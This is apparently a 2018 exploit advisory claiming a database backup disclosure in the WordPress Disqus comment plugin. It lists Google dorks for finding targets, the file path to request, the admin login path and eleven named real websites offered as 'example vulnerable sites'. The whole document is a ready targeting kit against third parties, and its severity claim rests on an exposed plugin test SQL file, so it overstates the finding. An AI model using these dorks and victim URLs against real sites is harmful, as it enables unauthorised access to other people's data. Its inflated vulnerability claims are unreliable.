################################################################################################# # Exploit Title : WordPress Disqus Comment System Plugins 2.87 Database Backup Disclosure # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 08/12/2018 # Vendor Homepage : disqus.com ~ wordpress.org/plugins/disqus-comment-system/ # Software Download Link : github.com/clearhead/clearhead.me/archive/master.zip + github.com/clearhead/clearhead.me/blob/master/wp-content/plugins/disqus-comment-system/tests/initial.sql # Tested On : Windows and Linux # Category : WebApps # Version Information : 2.87 and 3.0 # Exploit Risk : Medium # Google Dorks : inurl:''/wp-content/plugins/disqus-comment-system/tests/'' intext:''Greyzed Theme created by The Forge Web Creations. Powered by WordPress.'' intext:''A(c) 2008 - 2018 Grazitti Interactive. All rights reserved'' intext:''HyTrade Marketing & ComunicaASSAPSo A(c) 2017 | Todos direitos reservados'' intext:''A(c) 2018 Chainbit, LLC. All rights reserved'' intext:''Copyright 2015 / CIP Data Collection Ltd Company No. 10462735'' intext:''A(c) 2017 Longlife Magazine - All Rights Reserved.'' intext:''A(c) Copyright Feira Cultural 2017. Todos os direitos reservado'' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ] ################################################################################################# -- MySQL dump 10.13 Distrib 5.1.48, for apple-darwin10.4.0 (i386) -- -- Host: localhost Database: wordpress -- ------------------------------------------------------ -- Server version 5.1.48 ################################################################################################# # Admin Panel Login Path : /wp-login.php # Exploit : /wp-content/plugins/disqus-comment-system/tests/initial.sql ################################################################################################# # Example Vulnerable Sites => [+] therussianlinesman.com/blog/wp-content/plugins/disqus-comment-system/tests/initial.sql [+] hytrade.com.br/wp-content/plugins/disqus-comment-system/tests/initial.sql [+] grazitti.com/wp-content/plugins/disqus-comment-system/tests/initial.sql [+] paulsforza.com/wordpress/wp-content/plugins/disqus-comment-system/tests/initial.sql [+] combbo.com.br/cmb/wp-content/plugins/disqus-comment-system/tests/initial.sql [+] uof7.com/wp-content/plugins/disqus-comment-system/tests/initial.sql [+] ecommerceandb2b.com/b2bblog/wp-content/plugins/disqus-comment-system/tests/initial.sql [+] cipmetering.com/wp-content/plugins/disqus-comment-system/tests/initial.sql [+] soogran.com/wp-content/plugins/disqus-comment-system/tests/initial.sql [+] longlifemagz.com/wp-content/plugins/disqus-comment-system/tests/initial.sql [+] feiracultural.art.br/wp-content/plugins/disqus-comment-system/tests/initial.sql ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################